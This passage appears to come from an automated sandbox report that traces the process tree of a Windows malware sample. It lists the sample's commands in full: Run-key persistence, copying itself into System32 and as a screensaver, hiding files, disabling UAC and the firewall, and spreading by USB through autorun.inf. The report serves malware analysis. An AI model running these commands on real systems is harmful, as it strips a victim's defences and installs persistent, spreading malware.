                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:2744
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      PID:2644
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:2492
                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                      attrib -R -H -S "C:\Windows\system32\pcclean.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                      PID:2692
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%windir%\system32\pcclean.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    PID:3032
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:292
                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                      attrib +R +H +S "C:\Windows\system32\pcclean.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Sets file to hidden
                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                      PID:792
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:548
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1136
                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                          attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                          PID:2476
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\Microsoft\Windows\rawcircle.scr"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1848
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:860
                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                              attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Sets file to hidden
                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                              PID:1732
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:388
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1624
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1356
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:468
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1980
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:1928
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c NET START seclogon
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:2004
                                                                                                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                            NET START seclogon
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:2936
                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                C:\Windows\system32\net1 START seclogon
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:2824
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1052
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:2040
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:2204
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1696
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2164
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1756
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • UAC bypass
                                                                                                                                                                                                                            PID:1064
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2784
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                              sc config upnphost start= auto
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                              PID:2080
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:2560
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                sc config SSDPSRV start= auto
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                PID:2656
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c sc config browser start= auto
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:1872
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                  sc config browser start= auto
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                  PID:2128
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c net start upnphost
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2632
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                    net start upnphost
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:2728
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                        C:\Windows\system32\net1 start upnphost
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:2704
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c net start SSDPSRV
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1368
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                          net start SSDPSRV
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:2764
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                              C:\Windows\system32\net1 start SSDPSRV
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:2108
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c net start browser
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:2904
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                net start browser
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:2304
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\net1 start browser
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:2716
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2348
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                      netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                      PID:2440
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:2308
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Modifies firewall policy service
                                                                                                                                                                                                                                                        PID:2880
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2668
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:2432
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:2924
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:2852
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:2256
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                  netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                  PID:1600
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:2916
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                    PID:2888
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1140
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                      PID:2284
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:948
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                        PID:1336
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:1608
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                          PID:2720
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:2468
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            PID:3068
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:2404
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:1568
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:1688
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:1704
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:776
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                      PID:2724
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:896
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                        PID:2212
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\rundll32.exe"
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1536
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                                                                        • Drops autorun.inf file
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:1680
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:1056
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:2440
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                attrib +R +H "C:\autorun.inf"
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                • Sets file to hidden
                                                                                                                                                                                                                                                                                                • Drops autorun.inf file
                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                PID:1724
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:2312
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                  attrib +R +H "F:\autorun.inf"
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                  • Sets file to hidden
                                                                                                                                                                                                                                                                                                  • Drops autorun.inf file
                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                  PID:1992
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:1540
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                    attrib -R -H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                    PID:756
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:2504
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                      attrib -R -H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                      PID:2008
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:1952
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                        attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                        PID:1228
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:2052
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                          attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                          PID:2384
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:2400
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:548
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:792
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                • Sets file to hidden
                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                PID:2932
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:1696
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                  attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                  • Sets file to hidden
                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                  PID:1692
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:1704
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                    attrib +R +H "F:\protect.bat"
